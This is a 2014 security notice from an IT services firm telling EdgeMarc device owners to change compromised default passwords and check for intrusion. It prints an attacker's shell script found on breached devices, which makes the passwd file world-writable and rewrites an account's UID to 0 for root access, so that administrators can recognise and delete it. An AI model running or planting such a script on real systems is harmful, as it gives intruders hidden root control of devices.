Resources | Ferrum Technology Services

IMPORTANT: EdgeMarc Device Passwords Potentially Compromised

Written by Ferrum Technology Services LLC | Jul 16, 2014 5:00:00 AM
Our partner, Bandwidth, has discovered an issue wherein EdgeMarc device default passwords may have been compromised on the internet.

Any customer who currently owns the EdgeMarc box should immediately change their password.

If you are unsure if your specific device has been compromised, you can take the following steps to investigate.  However, it is still highly recommended to change the password:

  • In the EdgeMarc GUI, under 'System' click on "Client List".  If there are any entries listed other than known and local IP addresses, there is a strong possibility that your device has been compromised.  To resolve, remove the offending IP address.

Additionally, the following steps should be taken to to ensure a secure device:

  • Disable PPTP (Point-to-Point Protocol) - Under PPTP server > Username, ensure there is no user built unless it is a known user.
  • Disallow WAN clients - Under VoIP ALG, uncheck both the 'allow clients on WAN' option, as well as the 'Enable LLDP' option.
  • Verify no additional scripting has taken place, by looking under 'User Commands'.  Specifically, if the following script is present, it will need to be deleted:

ln -sf /etc /etc/images/m.txt
chmod 777 /etc/images/m.txt/config/passwd
sed -i -e s'_'"501"'_'"0"'_' /etc/images/m.txt/config/passwd
sed -i -e s'_'"501"'_'"0"'_' /etc/images/m.txt/config/passwd
sed -i -e s'_'"/etc/images"'_'"/"'_' /etc/images/m.txt/config/passwd

Note:  Some EdgeMarc screens within the GUI save changes while you're making them, and others require you to hit a 'submit' button. Please take note of this while making your changes.

If assistance is needed in making this important password change, or if you have questions regarding this notice, please reach out to the Ferrum Technology Services team at (847) 697-3282 for assistance.